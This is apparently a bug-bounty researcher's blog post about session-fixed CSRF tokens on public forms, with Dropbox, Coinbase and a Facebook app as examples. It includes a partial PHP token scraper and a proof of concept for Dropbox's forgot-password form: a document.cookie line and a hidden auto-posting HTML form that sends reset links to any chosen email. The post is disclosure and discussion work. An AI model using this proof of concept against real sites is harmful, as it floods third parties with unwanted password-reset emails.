Every CSRF token need not be verified in order to prevent CSRF

Cross-Site Request Forgery (CSRF) is a type of attack that occurs when a malicious Web site, email, blog, instant message, or program causes a user’s Web browser to perform an unwanted action on a trusted site for which the user is currently authenticated. – Wikipedia


I had an interesting encounter with CSRF last week , one of them is yet to be fixed. Here is an interesting low impact issue

These days almost every form on a website use CSRF protection by default. Every time website load  , CSRF token should be different/unique/unpredictable . But this is not the case with 80% of websites out there. I’ll be explaining this two examples one is Dropbox and other is move-app(Facebook)

Let’s start.

Most of the dynamic website contain Sign in functionality as well as forgot password to recover the account.

“Most of the forgot password forms are vulnerable by design , a good practice is to ask a security question before sending reset link” – Aditya

My area of interest was CSRF token for the visitors , public forms like reset password ,sign in ,feedback and all. These tokens are session based (when the site load session started till you close  the browser).

The issue was token remains same for a particular session . For e.g when you submit reset password request first time , token is x, now every time you request areset password  token will be same x.

I thought to abuse this , I made a PHP crawler that will crawl the hidden CSRF value and thought to add token field with my CSRF form . here is the PHP code to extract all the input values from Coinbase.

$doc = new DOMDocument();
$tags = $doc->getElementsByTagName(‘input’);

foreach ($tags as $tag) {
$x= $tag->getAttribute(‘value’).’|’.$tag->nodeValue.”\n”;
echo $x;

I tried to submit my form by scrapped CSRF token ,  badass idea. Didn’t worked , because my page was not creating any session.

Now , the goal was clear I have to use my session to abuse the CSRF. So, what I did is copied my cookie and token and used cookie with document.cookie and token value, this time Bingo !.

In the case of Dropbox , they have js_csrf key in cookie which contain the value of CSRF . A full POC for dropbox is  here. Go to the forgot password page , copy the cookie and token now replace cookie with your cookie and token with your token and use it as long as you don’t close the browser.

document.cookie=”locale=en; gvc=MjY5NTY5NDI1ODg1MjkwOTc5MjU4MTMwMDAwMjQzNTA1ODg0NDM%3D; t=JK3SHAeVr2aKEoysoY5vSTOZ; js_csrf=AI2FTNdJcwJ9rgv-uA_Um_Bi; _ga=GA1.2.1136221818.1422608131; _dc_gtm_UA-279179-2=1; __ar_v4=D33PO2KM7ZEHNI2NW5CGWR%3A20150201%3A4%7C56766LR465ARRDJLPT63JW%3A20150201%3A4%7CU7C3RGPYVFBRPNTVQLPXAB%3A20150201%3A4; _gali=page-content”

<form action=”https://www.dropbox.com/forgot&#8221; method=”post” name=”manish”>
<input type=”hidden” name=”t” value=”AI2FTNdJcwJ9rgv-uA_Um_Bi” />
<input type=”hidden” name=”confirm” value=”go” id=”action” />
<input type=”hidden” name=”is_reset” value=”False” id=”action” />
<input type=”hidden” id=”pyxl4173474534052041227″ name=”email” value=”xyz@gmail.com” />


CSRF token is stored in cookie, change the email field to any known email associated with the dropbox and every time you reload this page, they will get a reset link.

In case of move app , there were no csrf field in cookie but token was cookie based. Same POC will work for move as well accept they don’t store a CSRF field in cookie.

so what’s the big deal ? I can use my session to abuse CSRF protection in this case and send number of reset link (burp repeater is other option but burp have some setting issue with most RoR applications)

Dropbox ,Facebook,Asana,coinbase and lot more have  confirmed the issue but they said this is low priority . They did won’t fix and I went down few ranks on Hackerone.


The issue is with almost 80% of websites ,most of them say either they have rate limiting scheme. Then why is CSRF protection  used ?

Hackerone’s implementation is  standard CSRF token implementation , every time a page load you get a new CSRF token .Any other possibility to abuse this ?



Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s